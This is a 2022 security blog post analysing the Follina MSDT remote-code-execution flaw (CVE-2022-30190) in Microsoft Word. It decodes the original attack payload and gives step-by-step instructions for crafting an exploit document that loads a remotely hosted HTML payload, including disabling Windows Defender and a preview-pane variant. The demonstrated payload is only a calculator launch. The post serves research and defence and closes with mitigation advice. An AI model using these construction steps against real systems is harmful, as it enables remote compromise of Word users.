Follina MSDT Vulnerability CVE-2022–30190 — Analysis and POC

6 min readJun 13, 2022

Brief on payload analysis, creating the malicious doc, triggering the exploit and the process flow

A short backstory..

On 27th of May 2022, nao_sec was researching on virustotal regarding CVE 2021–40444 (a previous vulnerability which leverages MSHTML engine to perform remote code execution by crafting a special Microsoft Office document). While doing so, he found a file inside Microsoft Word document that was interestingly using an external reference to call out an html file and that html file would execute a staged PowerShell code through Microsoft Support Diagnostic Tool (MSDT) which is being invoked by ms-msdt scheme. Three days later Microsoft issues CVE-2022–30190 regarding this MSDT vulnerability.

What now?

A Remote Code Execution (RCE) vulnerability exists in MSDT which when called from Microsoft Office Word documents, allows execution of nefarious code without user’s permission. An attacker exploiting this vulnerability can run arbitrary code, escalate privileges, move laterally into the network, view/ edit/ delete data, etc.. So basically when you open or preview an affected word document, a malicious code gets executed by MSDT in the background, and finally the attacker owns your system and your data are done!

Attack scenario:

The malicious word document can be shared to the target (phishing mail to start with) and once the target enables editing after opening the document (since shared via mail or downloaded from a external site), an exploit will be triggered and the adversary can have full access to the target system or the exploit can perform unintended malicious activities.

Some blue teaming!

Before we get into the POC, let us analyze the infected Microsoft Word document that was first shared by nao_sec, to understand some backstage activities. Get the sample doc from app.any.run to have some basic analysis.

Extracting the word file, we could see the components and structure of the word document.

Parameters with strings referring to an external html file are identified inside word/_rels/document.xml.rels document. Target parameter specifies the URL of the html file and TargetMode describes it as External link. The domain shown in the snap is offline now.

Now we shall analyze the contents of RDF842l.html from app.any.run’s process-flow tab. You can see the full code at my github repo.

Here we can see the usual html tags and then comes the script tag with numerous ‘A’s, which is put to increase the payload size (minimum 4096 bytes) to trigger the exploit. Researchers have confirmed the buffer size for HTML processing, and confirmed that the exploit doesn’t get invoked if the file size is less than 4096 bytes.

Then at the bottom we have the window.location.href which points to ms-msdt scheme. Here, msdt is used to invoke PCWDiagnostic. The parameter IT_BrowseForFile has some base64 encoded strings. Let us decode to analyze them.

Decoding the data inside IT_BrowseForFile() parameter.

Here comes the interesting part!

The path to cmd.exe is stored in a variable called “cmd”.
A cmd.exe process is started in hidden mode, and kills any existing msdt processes that are running.
It recursively searches for a base64 encoded string for an encoded CAB file inside an archive named “05–2022–0438.rar”, and then decodes and extracts the CAB file and finally execute rgb.exe.
Here rgb.exe is presumed to be some kind of malware which gets triggered by msdt process to give remote access to an attacker or perform any malicious or unintended tasks on the target.

The code inside the parameter IT_BrowseForFile=h$(), contains the command that the attacker intends to execute. For POC purpose let us modify the contents of IT_BrowseForFile=h$() parameter to spawn a calc.exe process.

Proof-Of-Concept (POC)

Let’s follow some steps to construct a POC to exploit this vulnerability for “education and research purposes”.

Step 1: Open a word document, insert a Bitmap OLE object and save the document file as samplePOC.docx.

Insert OLE (Object Linking and Embedding) object

Step 2: Open the document structure (I’m using 7zip).

Step 3: Edit word/_rels/cocument.xml.rels file as follows. Find the Relationship XML tag with attribute Target=”embeddings/oleObject1.bin” and modify it as Target=”http://<server-ip:server-port>/payload.html!” and additionally add TargetMode=”External”. Then save and acknowledge the modification.

Note: Specify your server ip and its corresponding port which is going host the html payload file.

Step 4: Similarly, edit word/document.xml file. In edit mode, search for OLEObject, near to that, modify Type=”Embed” parameter to Type=”Link” and also include UpdateMode=”OnCall”. Once done save and acknowledge the modification.

Now we have created the malicious document which can trigger msdt process to execute the html payload that we host in our server. Now let’s configure the html payload file and host it. You can get the modified html payload file (calc.exe launcher) from my github repo.

Now serve the html file. I use python to host it.

So, now the malicious document that we crafted is sitting on the target PC and we have hosted the html payload on our server. Now, if the target opens the crafted word document, msdt process will be invoked by Microsoft Word, and it will fetch the hosted payload and executes it on the target PC. Let’s stimulate that by opening the samplePOC.docx.

Note: Disable Windows Defender, as the recent update will detect the vulnerability as Mesdetty.*

msdt process is created by Microsoft Office Word

In-turn, as we specified in the html payload file, calculator process is spawned by msdt

This concludes our POC.

This exploit can further be scoped to remote code execution, data theft, APT etc.., by modifying the commands inside IT_BrowseForFile=h$().

Additionally, by adding these parameters under <o:OLEObject> element in word/document.xml at step 4 will create a RTF version of the exploit. This makes the exploit to get triggered when the document is just previewed in the preview pane.

A very quick look on the processes!

With the great help of Microsoft’s Sysinternals’ Process Explorer, we can inspect that a msdt.exe child process is created by WINWORD.EXE (Microsoft Office Word) and sdiagnhost.exe, spawns a conhost.exe process and then Calculator.exe is spawned under the parent of sdiagnhost.exe.

msdt.exe process created by WINWORD.EXE as child process

Final Thoughts!

Now that, Microsoft Windows Defender is detecting and shielding CVE-2022–30190 as Mesdetty.*, disabling MSDT URL Protocol (allows troubleshooters being launched as links including links throughout the operating system) must be in your checklist to defend against this vulnerability.